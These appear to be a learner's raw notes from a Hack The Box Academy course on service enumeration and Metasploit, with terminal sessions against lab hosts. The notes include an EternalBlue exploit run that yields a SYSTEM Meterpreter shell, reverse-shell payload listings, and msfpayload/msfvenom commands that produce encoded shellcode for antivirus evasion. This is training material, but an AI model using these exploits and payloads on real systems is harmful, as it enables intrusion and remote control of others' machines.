Enum4Linux-ng - Enumeration

  SMB

Tonyleevo@htb[/htb]$ ./enum4linux-ng.py 10.129.14.128 -A

ENUM4LINUX - next generation

==========================

| Target Information |

==========================

[*] Target ........... 10.129.14.128

[*] Username ......... ''

[*] Random Username .. 'juzgtcsu'

[*] Password ......... ''

[*] Timeout .......... 5 second(s)

=====================================

| Service Scan on 10.129.14.128 |

=====================================

[*] Checking LDAP

[-] Could not connect to LDAP on 389/tcp: connection refused

[*] Checking LDAPS

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~]

└──╼ [★]$ rpcclient -U "" 10.129.97.13

Password for [WORKGROUP\]:

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: InlaneFreight SMB server (Samba, Ubuntu)

Total Users: 0

Total Groups: 0

Total Aliases: 0

Sequence No: 1738509492

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

Domain Information

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~]

└──╼ [★]$ rpcclient -U "" 10.129.97.13

Password for [WORKGROUP\]:

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: InlaneFreight SMB server (Samba, Ubuntu)

Total Users: 0

Total Groups: 0

Total Aliases: 0

Sequence No: 1738509492

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

pcclient $> netsharegetinfo

Usage: netsharegetinfo sharename [infolevel 1|2|502|1005]

rpcclient $> netsharegetinfo sambashare

netname: sambashare

remark: InFreight SMB v3.1

path: C:\home\sambauser\

password:

type: 0x0

nfs

Network File System

 (

) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems over a network as if they were local. However, it uses an entirely different protocol. 

 is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers

NFS is based on the 

 (

/

) protocol exposed on 

 and 

 ports 

, which uses 

 (

) for the system-independent exchange of data. 

ExportFS

  NFS

root@nfs:~# echo '/mnt/nfs 10.129.14.0/24(sync,no_subtree_check)' >> /etc/exports

root@nfs:~# systemctl restart nfs-kernel-server

root@nfs:~# exportfs

/mnt/nfs 10.129.14.0/24

onyleevo@htb[/htb]$ sudo nmap

10.129.97.13

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 17:12 CEST

Nmap scan report for 10.129.14.128

Host is up (0.00018s latency).

PORT STATE SERVICE VERSION

111/tcp open rpcbind 2-4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100000 3,4 111/tcp6 rpcbind

| 100000 3,4 111/udp6 rpcbind

| 100003 3 2049/udp nfs

| 100003 3 2049/udp6 nfs

Tonyleevo@htb[/htb]$ sudo nmap --script nfs* 10.129.14.128 -sV -p111,2049

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 17:37 CEST

Nmap scan report for 10.129.14.128

Host is up (0.00021s latency).

PORT STATE SERVICE VERSION

111/tcp open rpcbind 2-4 (RPC #100000)

| nfs-ls: Volume /mnt/nfs

| access: Read Lookup NoModify NoExtend NoDelete NoExecute

| PERMISSION UID GID SIZE TIME FILENAME

| rwxrwxrwx 65534 65534 4096 2021-09-19T15:28:17 .

| ?????????? ? ? ? ? ..

| rw-r--r-- 0 0 1872 2021-09-19T15:27:42 id_rsa

| rw-r--r-- 0 0 348 2021-09-19T15:28:17 id_rsa.pub

| rw-r--r-- 0 0 0 2021-09-19T15:22:30 nfs.share

Show Available NFS Shares

  NFS

Tonyleevo@htb[/htb]$ showmount -e

10.129.97.13

Export list for 10.129.14.128:

/mnt/nfs 10.129.14.0/24

Mounting NFS Share

  NFS

Tonyleevo@htb[/htb]$ mkdir target-NFS

Tonyleevo@htb[/htb]$ sudo mount -t nfs 10.129.14.128:/ ./target-NFS/ -o nolock

Tonyleevo@htb[/htb]$ cd target-NFS

Tonyleevo@htb[/htb]$ tree .

.

└── mnt

List Contents with Usernames & Group Names

  NFS

Tonyleevo@htb[/htb]$ ls -l mnt/nfs/

total 16

-rw-r--r-- 1 cry0l1t3 cry0l1t3 1872 Sep 25 00:55 cry0l1t3.priv

-rw-r--r-- 1 cry0l1t3 cry0l1t3 348 Sep 25 00:55 cry0l1t3.pub

-rw-r--r-- 1 root root 1872 Sep 19 17:27 id_rsa

-rw-r--r-- 1 root root 348 Sep 19 17:28 id_rsa.pub

-rw-r--r-- 1 root root 0 Sep 19 17:22 nfs.share

List Contents with UIDs & GUIDs

  NFS

Tonyleevo@htb[/htb]$ ls -n mnt/nfs/

total 16

-rw-r--r-- 1 1000 1000 1872 Sep 25 00:55 cry0l1t3.priv

-rw-r--r-- 1 1000 1000 348 Sep 25 00:55 cry0l1t3.pub

-rw-r--r-- 1 0 1000 1221 Sep 19 18:21 backup.sh

-rw-r--r-- 1 0 0 1872 Sep 19 17:27 id_rsa

-rw-r--r-- 1 0 0 348 Sep 19 17:28 id_rsa.pub

It is important to note that if the 

 option is set, we cannot edit the 

 file even as 

.

Unmounting

  NFS

Tonyleevo@htb[/htb]$ cd ..

Tonyleevo@htb[/htb]$ sudo umount ./target-NFS

└──╼ [★]$ cd var/nfs

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/var/nfs]

└──╼ [★]$ ls

flag.txt

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/var/nfs]

└──╼ [★]$ cd ../../mnt/nfsshare/

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/mnt/nfsshare]

└──╼ [★]$ ls

flag.txt

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/mnt/nfsshare]

└──╼ [★]$ cat flag.txt

HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/mnt/nfsshare]

└──╼ [★]$

└──╼ [★]$ cd var/nfs

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/var/nfs]

└──╼ [★]$ ls

flag.txt

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/var/nfs]

└──╼ [★]$ CD ../../MNT/NFSSHARE/

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/mnt/nfsshare]

└──╼ [★]$ ls

flag.txt

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/mnt/nfsshare]

└──╼ [★]$ cat flag.txt

HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}

┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~/target-NFS/mnt/nfsshare]

└──╼ [★]$

snmp

Routing information, services bound to additional interfaces, and the version of installed software can also be revealed.

  Service Scanning

Tonyleevo@htb[/htb]$ snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

iso.3.6.1.2.1.1.5.0 = STRING: "gs-svcscan"

  Service Scanning

Tonyleevo@htb[/htb]$ snmpwalk -v 2c -c private 10.129.42.253

Timeout: No Response from 10.129.42.253

A tool such as onesixtyone can be used to brute force the community string names using a dictionary file of common community strings such as the dict.txt file included in the GitHub repo for the tool.

  Service Scanning

Tonyleevo@htb[/htb]$ onesixtyone -c dict.txt 10.129.42.254

Scanning 1 hosts, 51 communities

10.129.42.254 [public] Linux gs-svcscan 5.4.0-66-generic #74-Ubuntu SMP Wed Jan 27 22:54:38 UTC 2021 x86_64

Simple Network Management Protocol (SNMP) was created to monitor network devices. In addition, this protocol can also be used to handle configuration tasks and change settings remotely.

To ensure that SNMP access works across manufacturers and with different client-server combinations, the Management Information Base (MIB) was created. MIB is an independent format for storing device information. A MIB is a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. It contains at least one Object Identifier (OID), which, in addition to the necessary unique address and a name, also provides information about the type, access rights, and a description of the respective object. MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format.

SNMP Daemon Config

SNMP

Tonyleevo@htb[/htb]$ cat /etc/snmp/snmpd.conf | grep -v "#" | sed -r '/^\s*$/d'

sysLocation Sitting on the Dock of the Bay

sysContact Me <me@example.org>

sysServices 72

master agentx

agentaddress 127.0.0.1,[::1]

view systemonly included .1.3.6.1.2.1.1

view systemonly included .1.3.6.1.2.1.25.1

rocommunity public default -V systemonly

SNMPwalk

SNMP

Tonyleevo@htb[/htb]$ snmpwalk -v2c -c public

10.129.42.195

iso.3.6.1.2.1.1.1.0 = STRING: "Linux htb 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 x86_64"

iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10

iso.3.6.1.2.1.1.3.0 = Timeticks: (5134) 0:00:51.34

iso.3.6.1.2.1.1.4.0 = STRING: "mrb3n@inlanefreight.htb"

iso.3.6.1.2.1.1.5.0 = STRING: "htb"

iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"

iso.3.6.1.2.1.1.7.0 = INTEGER: 72

iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00

iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1

iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1

iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1

OneSixtyOne

SNMP

Tonyleevo@htb[/htb]$ sudo apt install onesixtyone

Tonyleevo@htb[/htb]$ onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt 10.129.14.128

Scanning 1 hosts, 3220 communities

10.129.14.128 [public] Linux htb 5.11.0-37-generic #41~

Braa

SNMP

Tonyleevo@htb[/htb]$ sudo apt install braa

Tonyleevo@htb[/htb]$ braa <community string>@<IP>:.1.3.6.* # Syntax

Tonyleevo@htb[/htb]$ braa public@10.129.14.128:.1.3.6.*

10.129.14.128:20ms:.1.3.6.1.2.1.1.1.0:Linux htb 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 x86_64

10.129.14.128:20ms:.1.3.6.1.2.1.1.2.0:.1.3.6.1.4.1.8072.3.2.10

10.129.14.128:20ms:.1.3.6.1.2.1.1.3.0:548

10.129.14.128:20ms:.1.3.6.1.2.1.1.4.0:mrb3n@inlan

gobuster

gobuster dir -u http://

10.129.42.249

An HTTP status code of 

 reveals that the resource's request was successful, while a 403 HTTP status code indicates that we are forbidden to access the resource. A 301 status code indicates that we are being redirected, which is not a failure case. It is worth familiarizing ourselves with the various HTTP status codes, which can be found 

. The 

 Academy Module also covers HTTP status codes further in-depth.

94.237.54.69:

DNS Subdomain Enumeration

There also may be essential resources hosted on subdomains, such as admin panels or applications with additional functionality that could be exploited. We can use GoBuster to enumerate available subdomains of a given domain using the dns flag to specify DNS mode. First, let us clone the SecLists GitHub repo, which contains many useful lists for fuzzing and exploitation:

Install SecLists

  Web Enumeration

Tonyleevo@htb[/htb]$ git clone https://github.com/danielmiessler/SecLists

  Web Enumeration

Tonyleevo@htb[/htb]$ sudo apt install seclists -y

Next, add a DNS Server such as 1.1.1.1 to the /etc/resolv.conf file. We will target the domain inlanefreight.com, the website for a fictional freight and logistics company.

  Web Enumeration

Tonyleevo@htb[/htb]$ gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

curl

DNS Subdomain Enumeration

There also may be essential resources hosted on subdomains, such as admin panels or applications with additional functionality that could be exploited. We can use GoBuster to enumerate available subdomains of a given domain using the dns flag to specify DNS mode. First, let us clone the SecLists GitHub repo, which contains many useful lists for fuzzing and exploitation:

Install SecLists

  Web Enumeration

Tonyleevo@htb[/htb]$ git clone https://github.com/danielmiessler/SecLists

  Web Enumeration

Tonyleevo@htb[/htb]$ sudo apt install seclists -y

Next, add a DNS Server such as 1.1.1.1 to the /etc/resolv.conf file. We will target the domain inlanefreight.com, the website for a fictional freight and logistics company.

  Web Enumeration

Tonyleevo@htb[/htb]$ gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

Tonyleevo@htb[/htb]$ curl http://10.129.42.190

<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Tonyleevo@htb[/htb]$ curl -s http://

10.129.23.161

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<users>

<user username="admin">

<id type="integer">0</id>

<session_fail_count type="integer">2</session_fail_count>

<session_date type="integer">1608182184</session_date>

</user>

<blacklist type="string" ip="10.10.10.1">

<date type="integer">1512964659</date>

<fail_count type="integer">1</fail_count>

</blacklist>

<blacklist type="string" ip="10.10.14.2">

<date type="integer">1608182171</date>

<fail_count type="integer">5</fail_count>

</blacklist>

</users>

whatweb

Whatweb

We can extract the version of web servers, supporting frameworks, and applications using the command-line tool whatweb. This information can help us pinpoint the technologies in use and begin to search for potential vulnerabilities.

  Web Enumeration

Tonyleevo@htb[/htb]$ whatweb 10.10.10.121

http://10.10.10.121 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], Email[license@php.net], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.121], Title[PHP 7.4.3 - phpinfo()]

Whatweb is a handy tool and contains much functionality to automate web application enumeration across a network.

  Web Enumeration

Tonyleevo@htb[/htb]$ whatweb --no-errors 10.10.10.0/24

http://10.10.10.11 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx/1.14.1], IP[10.10.10.11], PoweredBy[Red,nginx], Title[Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux], nginx[1.14.1]

http://10.10.10.100 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.100], Title[File Sharing Service]

http://10.10.10.121 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], Email[license@php.net], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.121], Title[PHP 7.4.3 - phpinfo()]

http://10.10.10.247 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[contact@cross-fit.htb], Frame, HTML5, HTTPServer[OpenBSD httpd], IP[10.10.10.247], JQuery[3.3.1], PHP[7.4.12], Script, Title[Fine Wines], X-Powered-By[PHP/7.4.12], X-UA-Compatible[ie=edge]

onyleevo@htb[/htb]$ whatweb http://10.129.42.190/nibbleblog

http://10.129.42.190/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.42.190], RedirectLocation[http://10.129.42.190/nibbleblog/], Title[301 Moved Permanently]

http://10.129.42.190/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, H

searchsploit/exploitDB

A well-known tool for this purpose is searchsploit, which we can use to search for public vulnerabilities/exploits for any application. We can install it with the following command:

  Public Exploits

Tonyleevo@htb[/htb]$ sudo apt install exploitdb -y

Then, we can use searchsploit to search for a specific application by its name, as follows:

  Public Exploits

Tonyleevo@htb[/htb]$ searchsploit openssh 7.2

----------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Exploit Title | Path

----------------------------------------------------------------------------------------------------------------------------- ---------------------------------

OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py

OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py

OpenSSH 7.2 - Denial of Service | linux/dos/40888.py

OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py

OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py

OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt

OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt

OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py

OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt

----------------------------------------------------------

metasploit

Once we have Metasploit running, we can search for our target application with the search exploit command. For example, we can search for the SMB vulnerability we identified previously:

  Public Exploits

msf6 > search exploit eternalblue

Matching Modules

================

# Name Disclosure Date Rank Check Description

• ---- --------------- ---- ----- -----------

<SNIP>

EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010

Tip: Search can apply complex filters such as search cve:2009 type:exploit. See all the filters with help search

We found one exploit for this service. We can use it by copying the full name of it and using USE to use it:

  Public Exploits

msf6 > use exploit/windows/smb/ms17_010_psexec

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command:

  Public Exploits

Module options (exploit/windows/smb/ms17_010_psexec):

Name Current Setting Required Description

---- --------------- -------- -----------

DBGTRACE false yes Show extra debug trace info

LEAKATTEMPTS 99 yes How many times to try to leak transaction

NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)

NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

RPORT 445 yes The Target port (TCP)

SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing

SERVICE_DISPLAY_NAME no The service display name

SERVICE_NAME no The service name

SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

SMBDomain . no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

...SNIP...

Any option with Required set to yes needs to be set for the exploit to work. In this case, we only have two options to set: RHOSTS, which means the IP of our target (this can be one IP, multiple IPs, or a file containing a list of IPs). The second option, LHOST, represents the IP of our attack host (this can be a single IP, or the name of a network interface. In the example below, LHOST is being set to the IP associated with our tun0 interface.) We can set them with the set command:

  Public Exploits

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40

RHOSTS => 10.10.10.40

msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0

LHOST => tun0

Once we have both options set, we can start the exploitation. However, before we run the script, we can run a check to ensure the server is vulnerable:

  Public Exploits

msf6 exploit(windows/smb/ms17_010_psexec) > check

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check

[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)

[+] 10.10.10.40:445 - The target is vulnerable.

As we can see, the server is indeed vulnerable. Note that not every exploit in the Metasploit Framework supports the check function. Finally, we can use the run or exploit command to run the exploit:

  Public Exploits

msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444

[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1

[*] 10.10.10.40:445 - Built a write-what-where primitive...

[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!

[*] 10.10.10.40:445 - Selecting PowerShell target

[*] 10.10.10.40:445 - Executing the payload...

[+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...

[*] Sending stage (175174 bytes) to 10.10.10.40

[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.40:49159) at 2020-12-27 01:13:28 +0000

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > shell

Process 39640 created.

Channel 0 created.

Windows 7 Professional 7601 Service Pack 1

(C) Copyright 1985-2009 Microsoft Corp.

C:\WINDOWS\system32>whoami

NT AUTHORITY\SYSTEM

metasploit structure

Modules

The Modules detailed above are split into separate categories in this folder. We will go into detail about these in the next sections. They are contained in the following folders:

  Introduction to Metasploit

Tonyleevo@htb[/htb]$ ls /usr/share/metasploit-framework/modules

auxiliary encoders evasion exploits nops payloads post

Plugins

Plugins offer the pentester more flexibility when using the msfconsole since they can easily be manually or automatically loaded as needed to provide extra functionality and automation during our assessment.

  Introduction to Metasploit

Tonyleevo@htb[/htb]$ ls /usr/share/metasploit-framework/plugins/

aggregator.rb ips_filter.rb openvas.rb sounds.rb

alias.rb komand.rb pcap_log.rb sqlmap.rb

auto_add_route.rb lab.rb request.rb thread.rb

beholder.rb libnotify.rb rssfeed.rb token_adduser.rb

db_credcollect.rb msfd.rb sample.rb token_hunter.rb

db_tracker.rb msgrpc.rb session_notifier.rb wiki.rb

event_tester.rb nessus.rb session_tagger.rb wmap.rb

ffautoregen.rb nexpose.rb socket_logger.rb

Scripts

Meterpreter functionality and other useful scripts.

  Introduction to Metasploit

Tonyleevo@htb[/htb]$ ls /usr/share/metasploit-framework/scripts/

meterpreter ps resource shell

Tools

Command-line utilities that can be called directly from the msfconsole menu.

  Introduction to Metasploit

Tonyleevo@htb[/htb]$ ls /usr/share/metasploit-framework/tools/

context docs hardware modules payloads

dev exploit memdump password recon

 What command do you use to interact with the free version of Metasploit?

Syntax

  Modules

<No.> <type>/<os>/<service>/<name>

Example

  Modules

794 exploit/windows/ftp/scriptftp_list

Note that when selecting a module to use for payload delivery, the use <no.> command can only be used with the following modules that can be used as initiators (or interactable modules):

MSF - Specific Search

  Modules

msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft

Matching Modules

================

# Name Disclosure Date Rank Check Description

• ---- --------------- ---- ----- -----------

0 exploit/windows/http/exchange_proxylogon_rce 2021-03-02 excellent Yes Microsoft Exchange ProxyLogon RCE

1 exploit/windows/http/exchange_proxyshell_rce 2021-04-06 excellent Yes Microsoft Exchange ProxyShell RCE

2 exploit/windows/http/sharepoint_unsafe_control 2021-05-11 excellent Yes Microsoft SharePoint Unsafe Control and ViewState RCE

targets

  Targets

msf6 exploit(windows/browser/ie_execcommand_uaf) > show targets

Exploit targets:

Id Name

-- ----

0 Automatic

1 IE 7 on Windows XP SP3

2 IE 8 on Windows XP SP3

3 IE 7 on Windows Vista

4 IE 8 on Windows Vista

5 IE 8 on Windows 7

6 IE 9 on Windows 7

msf6 exploit(windows/browser/ie_execcommand_uaf) > set target 6

target => 6

diagram

payloads

 in Metasploit refers to a module that aids the exploit module in (typically) returning a shell to the attacker. The payloads are sent together with the exploit itself to bypass standard functioning procedures of the vulnerable service (

) and then run on the target OS to typically return a reverse connection to the attacker and establish a foothold (

).

Singles

A Single payload contains the exploit and the entire shellcode for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all-in-one. However, some exploits will not support the resulting size of these payloads as they can get quite large. Singles are self-contained payloads. They are the sole object sent and executed on the target system, getting us a result immediately after running. A Single payload can be as simple as adding a user to the target system or booting up a process.

Stagers

Stager payloads work with Stage payloads to perform a specific task. A Stager is waiting on the attacker machine, ready to establish a connection to the victim host once the stage completes its run on the remote host. Stagers are typically used to set up a network connection between the attacker and victim and are designed to be small and reliable. Metasploit will use the best one and fall back to a less-preferred one when necessary.

MSF - Staged Payloads

  Payloads

msf6 > show payloads

<SNIP>

535 windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager

536 windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support

537 windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager

538 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager

539 windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)

540 windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)

541 windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)

542 windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)

543 windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager

544 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager

545 windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)

546 windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)

547 windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)

548 windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)

<SNIP>

MSF - Searching for Specific Payload

  Payloads

msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads

6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager

7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support

8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager

9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager

10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)

11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)

12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)

13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)

14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager

15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager

16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)

17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)

18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)

19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)

msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter show payloads

[*] 14

This gives us a total of 14 results. Now we can add another grep command after the first one and search fo

Encoders

Encoders

Over the 15 years of existence of the Metasploit Framework, Encoders have assisted with making payloads compatible with different processor architectures while at the same time helping with antivirus evasion. Encoders come into play with the role of changing the payload to run on different operating systems and architectures. These architectures include:

Selecting an Encoder

Before 2015, the Metasploit Framework had different submodules that took care of payloads and encoders. They were packed separately from the msfconsole script and were called msfpayload and msfencode. These two tools are located in /usr/share/framework2/.

If we wanted to create our custom payload, we could do so through msfpayload, but we would have to encode it according to the target OS architecture using msfencode afterward. A pipe would take the output from one command and feed it into the next, which would generate an encoded payload, ready to be sent and run on the target machine.

  Encoders

Tonyleevo@htb[/htb]$ msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai

[*] x86/shikata_ga_nai succeeded with size 1636 (iteration=1)

my $buf =

"\xbe\x7b\xe6\xcd\x7c\xd9\xf6\xd9\x74\x24\xf4\x58\x2b\xc9" .

"\x66\xb9\x92\x01\x31\x70\x17\x83\xc0\x04\x03\x70\x13\xe2" .

"\x8e\xc9\xe7\x76\x50\x3c\xd8\xf1\xf9\x2e\x7c\x91\x8e\xdd" .

"\x53\x1e\x18\x47\xc0\x8c\x87\xf5\x7d\x3b\x52\x88\x0e\xa6" .

"\xc3\x18\x92\x58\xdb\xcd\x74\xaa\x2a\x3a\x55\xae\x35\x36" .

"\xf0\x5d\xcf\x96\xd0\x81\xa7\xa2\x50\xb2\x0d\x64\xb6\x45" .

"\x06\x0d\xe6\xc4\x8d\x85\x97\x65\x3d\x0a\x37\xe3\xc9\xfc" .

"\xa4\x9c\x5c\x0b\x0b\x49\xbe\x5d\x0e\xdf\xfc\x2e\xc3\x9a" .

Generating Payload - Without Encoding

  Encoders

Tonyleevo@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl

Found 11 compatible encoders

